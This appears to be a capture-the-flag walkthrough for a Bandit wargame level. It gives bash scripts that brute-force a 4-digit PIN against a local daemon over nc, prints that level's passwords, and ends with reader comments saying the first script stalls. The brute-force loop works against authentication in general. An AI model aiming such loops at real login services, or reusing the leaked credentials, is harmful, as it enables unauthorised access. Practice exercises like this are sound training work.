Level goal: A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
The following is my script to perform this brute-forcing technique:
#!/bin/bash
# Password for bandit24, sent together with each candidate PIN.
pass24=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
pin=0
# Try every PIN from 0 up to 9999, one connection per attempt.
while [ $pin -lt 10000 ]; do
    echo "Attempting PIN: $pin"
    attempt="$(echo $pass24 $pin | nc localhost 30002)"
    # Any reply that is not "Wrong!" contains the bandit25 password.
    if ! [[ $attempt == *"Wrong!"* ]]; then
        echo -ne "$attempt"
        break
    fi
    ((pin++))
done
The script iterates through every possible PIN, brute-forcing the secret pincode that unlocks the password for bandit25.
The password to gain access to the next level is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG.
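An added example, not the script from this write-up: it generates all 10000 candidate lines and streams them through a single nc connection instead of opening one connection per PIN, then filters out the daemon's "Wrong!" replies. It assumes the daemon answers one line per attempt; the sample replies and the placeholder password are constructed for offline testing.

```shell
#!/bin/bash
# Added example, not the original post's script. Assumes the daemon
# on port 30002 answers one line per "<password> <pin>" line it reads.

# Print all 10000 candidate lines ("<pass> 0000" .. "<pass> 9999").
gen_attempts() {
  local pass="$1" pin
  for pin in $(seq 0 9999); do
    printf '%s %04d\n' "$pass" "$pin"
  done
}

# Drop "Wrong!" replies and blank lines; whatever remains is the
# daemon's answer for the correct PIN.
filter_replies() {
  grep -v -e 'Wrong!' -e '^[[:space:]]*$'
}

# One connection for the whole run (only meaningful on the bandit24 host).
brute_force() {
  gen_attempts "$1" | nc localhost 30002 | filter_replies
}

# Constructed sample of daemon output, used to exercise the filter offline.
SAMPLE_REPLIES='Wrong!
Wrong!
Correct!
The password of user bandit25 is PLACEHOLDER-PASSWORD'

demo_filter() {
  printf '%s\n' "$SAMPLE_REPLIES" | filter_replies
}
```

Run it on the bandit24 host as `brute_force "$pass24"`; the constructed sample only shows what the filter keeps.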
Richardn
February 15, 2020
This solution doesn't work because the shell will be stuck at line:
attempt="$(echo $pass24 $pin | nc localhost 30002)"
The daemon receives a single trial, outputs a "Wrong!" and waits for the next input, rendering the nc command not finished until a timeout after around 10 secs.
So your shell takes 10 secs for a single trial...
For me, I echoed all the possible trials into a file called trials by a shell, then:
nc localhost 30002 < trials > results
uniq -u results
kongwenbin
August 17, 2021
Hi Richardn, my solution worked for me back then when I was doing it hands-on, not sure what happened now. I have seen a few other comments on something not working with their PuTTY session. Thanks for sharing your solution, I have approved it so others can see it too, I appreciate your sharing 🙂